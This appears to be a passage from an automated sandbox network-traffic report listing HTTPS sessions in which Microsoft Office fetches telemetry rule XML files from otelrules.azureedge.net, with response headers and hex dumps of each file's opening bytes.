                                          2024-11-18 22:45:02 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:02 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:02 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1358
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                          ETag: "0x8DC582BE022ECC5"
                                          x-ms-request-id: 99c36cd7-201e-0096-7ccd-37ace6000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224502Z-16547b76f7fl5zvnhC1DFWtk9g00000004ug00000000nr0k
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:02 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          115192.168.2.45739413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:02 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:02 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:02 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1389
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                          ETag: "0x8DC582BE10A6BC1"
                                          x-ms-request-id: c22da945-001e-00ad-15a1-36554b000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224502Z-1866b5c5fbb2ngs6hC1DFW402w00000004k0000000011ce2
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:02 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          116192.168.2.45739513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:02 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:02 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:02 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1352
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                          ETag: "0x8DC582BE9DEEE28"
                                          x-ms-request-id: 75c178ff-801e-0067-31f8-36fe30000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224502Z-164f84587bfm8kdnhC1DFWey4g00000006h000000000nm1a
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:02 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          117192.168.2.45739613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:02 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:02 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:02 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1405
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                          ETag: "0x8DC582BE12B5C71"
                                          x-ms-request-id: 398e56de-301e-001f-6c81-37aa3a000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224502Z-17cf5b775c4jcv75hC1DFW1gm000000000fg000000002m0w
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:02 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          118192.168.2.45739713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:02 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:03 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:02 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1368
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                          ETag: "0x8DC582BDDC22447"
                                          x-ms-request-id: 969097d6-001e-0046-4dc6-37da4b000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224502Z-16547b76f7fhv4d5hC1DFW7h0n00000004v000000000an5v
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:03 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          119192.168.2.45739813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:03 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:03 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:03 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1401
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                          ETag: "0x8DC582BE055B528"
                                          x-ms-request-id: 93dd010c-d01e-0014-6aab-36ed58000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224503Z-16547b76f7fmcv27hC1DFWgpcg000000054000000000x30n
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:03 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          120192.168.2.45740013.107.246.454435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:03 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:03 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:03 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1397
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                          ETag: "0x8DC582BE7262739"
                                          x-ms-request-id: cc141125-801e-0067-1cd2-37fe30000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224503Z-16547b76f7fr5rfnhC1DFW0am400000003vg00000000q6x5
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:03 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          121192.168.2.45739913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:03 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:03 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:03 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1364
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                          ETag: "0x8DC582BE1223606"
                                          x-ms-request-id: e48d079a-201e-00aa-1709-373928000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224503Z-16547b76f7ffqpvqhC1DFWwf3n0000000120000000008svg
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:03 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          122192.168.2.45740113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:03 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:03 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:03 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1360
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                          ETag: "0x8DC582BDDEB5124"
                                          x-ms-request-id: 2191a5ff-b01e-00ab-7e9b-38dafd000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224503Z-r18f44ddb69xvwv5hC1DFWstpn00000000ng000000005d5b
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:03 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          123192.168.2.45740213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:03 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:04 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:03 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1403
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                          ETag: "0x8DC582BDCB4853F"
                                          x-ms-request-id: fffac850-701e-0098-3309-37395f000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224503Z-16547b76f7ftnm6xhC1DFW9c8c000000062g00000000b05n
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:04 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          124192.168.2.45740313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:04 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:04 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:04 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1366
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                          ETag: "0x8DC582BDB779FC3"
                                          x-ms-request-id: 70ecc3c7-201e-005d-13af-36afb3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224504Z-r18f44ddb69xvwv5hC1DFWstpn00000000gg00000000a6bv
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:04 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          125192.168.2.45740413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:04 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
